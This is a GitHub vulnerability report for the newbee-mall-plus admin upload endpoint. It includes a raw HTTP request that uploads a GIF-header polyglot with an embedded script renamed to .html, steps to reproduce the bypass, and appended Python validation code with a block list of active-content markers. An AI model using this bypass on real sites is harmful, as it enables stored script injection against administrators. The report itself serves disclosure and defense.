
[security vulnerability] File upload vulnerability #46

Open
@memilox

Description

Recently, our team discovered a file upload vulnerability in the latest version of the project.
[Suggested description]
A file upload vulnerability exists in newbee-mall-plus: the upload restriction in the upload method of UploadController can be bypassed by adding malicious content to real images.

[Vulnerability Type]
File upload vulnerability

[Vendor of Product]
https://github.com/newbee-ltd/newbee-mall-plus

[Affected Product Code Base]
V2.4.1

[Affected Component]
```http
POST /admin/upload/file HTTP/1.1
Host: localhost:28079
User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:83.0) Gecko/83.0 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1137582032273165729786442929
Content-Length: 292
Origin: http://localhost:28079
Connection: close
Referer: http://localhost:28079/admin/goods/edit
Cookie: SESSION=YWZlMDUxNjMtYWMxNy00MTg1LWI0YTMtYjhjMWFlZmZjNmIy
Upgrade-Insecure-Requests: 1

-----------------------------1137582032273165729786442929
Content-Disposition: form-data; name="file"; filename="spacer.html"
Content-Type: image/gif

GIF89a���!ù��,����D�;

<script>alert("xss")</script>

-----------------------------1137582032273165729786442929--
```

[Impact Code execution]
true

[Vulnerability proof]
1. Access the address http://localhost:28089/admin/goods, select a commodity to modify, and enter the file upload page.
2. Open the Burp Suite packet-capturing proxy and click to upload a picture.
3. By default, the system only supports JPG, PNG and GIF files. We can bypass this by adding malicious content to real images.
4. Modify the value of filename to spacer.html. The upload-success response returns the access path of the file:
5. Access the uploaded file's path; the vulnerability reproduction is complete.

[Defective code]
https://github.com/newbee-ltd/newbee-mall-plus/blob/a8c057d6145cf8c6f0dbc2dc05af8e1414f0bf2c/src/main/java/ltd/newbee/mall/controller/common/UploadController.java#L54
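The report's payload passes the server's image-type check because it begins with a genuine GIF header, and it becomes executable only because the stored file keeps the client-chosen `.html` extension and is later served as HTML. The following is an added example (not code from the newbee-mall-plus project, which is written in Java; Python is used here to keep the check language-neutral and runnable) of the validation an upload handler should apply: derive the extension from the detected content rather than from the client filename, reject a header/extension mismatch, reject image bodies carrying active-content markers, assign a random server-side name, and serve stored files with `X-Content-Type-Options: nosniff`. All function names and the `CLEAN_GIF`/`POLYGLOT` sample bytes are constructed for this example.

```python
import os
import secrets

# Magic-byte signatures of the three image types the admin upload endpoint is
# documented to accept (JPG, PNG, GIF), mapped to the extension the server will
# assign. Detection is by content, so neither the client filename nor the
# multipart Content-Type header decides the stored extension.
SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Byte patterns that have no business inside a plain raster image. A body with
# a valid image header plus one of these is a polyglot (the report's
# GIF89a + <script> payload is exactly that) and is rejected outright.
ACTIVE_CONTENT_MARKERS = (b"<script", b"<html", b"<svg", b"<?php", b"<%")


def detect_image_type(data: bytes):
    """Return 'jpg', 'png' or 'gif' based on the leading bytes, or None."""
    for signature, ext in SIGNATURES.items():
        if data.startswith(signature):
            return ext
    return None


def looks_like_polyglot(data: bytes) -> bool:
    """Heuristic: active-content markers anywhere in an image body."""
    lowered = data.lower()
    return any(marker in lowered for marker in ACTIVE_CONTENT_MARKERS)


def validate_upload(client_filename: str, data: bytes) -> str:
    """Validate an uploaded image and return the server-chosen stored name.

    Raises ValueError with a reason whenever the upload must be rejected.
    """
    claimed_ext = os.path.splitext(client_filename)[1].lower().lstrip(".")
    if claimed_ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {claimed_ext!r} is not an allowed image type")
    detected = detect_image_type(data)
    if detected is None:
        raise ValueError("content does not start with a JPG, PNG or GIF signature")
    normalized = "jpg" if claimed_ext == "jpeg" else claimed_ext
    if detected != normalized:
        raise ValueError(f"extension {claimed_ext!r} does not match content {detected!r}")
    if looks_like_polyglot(data):
        raise ValueError("image body contains active-content markers")
    # Random server-side name; the extension comes from the detected type, so a
    # renamed filename such as spacer.html can never reach the disk.
    return f"{secrets.token_hex(16)}.{detected}"


def check_upload(client_filename: str, data: bytes):
    """Non-raising wrapper returning (accepted, stored_name_or_reason)."""
    try:
        return True, validate_upload(client_filename, data)
    except ValueError as exc:
        return False, str(exc)


def serving_headers(stored_name: str) -> dict:
    """Headers for serving a stored image so a browser never renders it as HTML."""
    ext = os.path.splitext(stored_name)[1].lstrip(".")
    content_type = {"jpg": "image/jpeg", "png": "image/png", "gif": "image/gif"}[ext]
    return {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'inline; filename="{stored_name}"',
    }


# Constructed sample inputs (not captured from the project): a minimal 1x1 GIF
# and a GIF-header-plus-script polyglot shaped like the report's payload.
CLEAN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
             b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00"
             b"\x02\x02D\x01\x00;")
POLYGLOT = b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b'\n<script>alert("xss")</script>\n'

if __name__ == "__main__":
    for name, body in [("spacer.html", POLYGLOT), ("spacer.gif", POLYGLOT),
                       ("photo.png", CLEAN_GIF), ("photo.gif", CLEAN_GIF)]:
        print(name, check_upload(name, body))
```

Note that the magic-byte check on its own does not stop the report's payload (it is a real GIF header), and the marker scan is only a heuristic; the controls that actually remove the code-execution path are the server-generated extension and the `nosniff` header. Where an image library is available, re-encoding the upload to a fresh file is a stronger option than scanning the body.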
